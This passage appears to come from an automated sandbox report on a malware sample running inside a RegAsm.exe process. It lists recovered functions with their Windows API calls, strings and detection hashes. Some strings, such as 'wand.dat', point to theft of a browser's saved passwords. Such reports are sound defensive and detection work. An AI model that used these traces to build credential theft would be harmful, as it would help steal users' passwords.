                                                                                  • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                  • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                                  • String ID:
                                                                                  • API String ID: 4247780290-0
                                                                                  • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                  • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                  • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                  • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                  APIs
                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                  • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                  • memset.MSVCRT ref: 004450CD
                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                    • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                  • String ID:
                                                                                  • API String ID: 1471605966-0
                                                                                  • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                  • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                  • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                  • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                  APIs
                                                                                  • wcscpy.MSVCRT ref: 0044475F
                                                                                  • wcscat.MSVCRT ref: 0044476E
                                                                                  • wcscat.MSVCRT ref: 0044477F
                                                                                  • wcscat.MSVCRT ref: 0044478E
                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                    • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                    • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                  • String ID: \StringFileInfo\
                                                                                  • API String ID: 102104167-2245444037
                                                                                  • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                  • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                  • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                  • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                  APIs
                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@
                                                                                  • String ID:
                                                                                  • API String ID: 613200358-0
                                                                                  • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                  • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                  • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                  • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004100FB
                                                                                  • memset.MSVCRT ref: 00410112
                                                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                  • _snwprintf.MSVCRT ref: 00410141
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                  • String ID: </%s>
                                                                                  • API String ID: 3400436232-259020660
                                                                                  • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                  • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                  • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                  • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040D58D
                                                                                  • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                  • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                                                  • String ID: caption
                                                                                  • API String ID: 1523050162-4135340389
                                                                                  • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                  • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                  • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                  • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                  APIs
                                                                                    • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                    • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                  • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                  • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                  • String ID: MS Sans Serif
                                                                                  • API String ID: 210187428-168460110
                                                                                  • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                  • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                  • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                  • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040560C
                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                    • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                  • String ID: *.*$dat$wand.dat
                                                                                  • API String ID: 2618321458-1828844352
                                                                                  • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                  • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                  • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                  • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00412057
                                                                                    • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                  • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                  • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                  • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                  • String ID:
                                                                                  • API String ID: 3550944819-0
                                                                                  • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                  • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                  • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                  • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                  APIs
                                                                                  • free.MSVCRT ref: 0040F561
                                                                                  • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                  • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$free
                                                                                  • String ID: g4@
                                                                                  • API String ID: 2888793982-2133833424
                                                                                  • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                  • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                  • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                  • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004144E7
                                                                                    • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                    • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                  • memset.MSVCRT ref: 0041451A
                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 1127616056-0
                                                                                  • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                  • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                  • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                  • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                  APIs
                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                                  • malloc.MSVCRT ref: 00417459
                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                                                  • free.MSVCRT ref: 0041747F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$freemalloc
                                                                                  • String ID:
                                                                                  • API String ID: 2605342592-0
                                                                                  • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                  • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                  • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                  • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                  • RegisterClassW.USER32(?), ref: 00412428
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                  • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2678498856-0
                                                                                  • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                  • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                  • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                  • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040F673
                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                  • strlen.MSVCRT ref: 0040F6A2
                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 2754987064-0
                                                                                  • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                  • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                  • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                  • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040F6E2
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                  • strlen.MSVCRT ref: 0040F70D
                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 2754987064-0
                                                                                  • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                  • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                  • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                  • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: wcscpy$CloseHandle
                                                                                  • String ID: General
                                                                                  • API String ID: 3722638380-26480598
                                                                                  • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                  • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                  • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                  • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                  APIs
                                                                                    • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                    • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                    • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                  • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                  • String ID:
                                                                                  • API String ID: 764393265-0
                                                                                  • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                  • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                  • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                  • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                  APIs
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$System$File$LocalSpecific
                                                                                  • String ID:
                                                                                  • API String ID: 979780441-0
                                                                                  • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                  • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                  • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                  • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                  APIs
                                                                                  • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                  • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                  • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$DialogHandleModuleParam
                                                                                  • String ID:
                                                                                  • API String ID: 1386444988-0
                                                                                  • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                  • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                  • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                  • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                  APIs
                                                                                  • wcschr.MSVCRT ref: 0040F79E
                                                                                  • wcschr.MSVCRT ref: 0040F7AC
                                                                                    • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                    • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: wcschr$memcpywcslen
                                                                                  • String ID: "
                                                                                  • API String ID: 1983396471-123907689
                                                                                  • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                  • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                  • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                  • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                  APIs
                                                                                  • _snwprintf.MSVCRT ref: 0040A398
                                                                                  • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: _snwprintfmemcpy
                                                                                  • String ID: %2.2X
                                                                                  • API String ID: 2789212964-323797159
                                                                                  • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                  • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                  • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
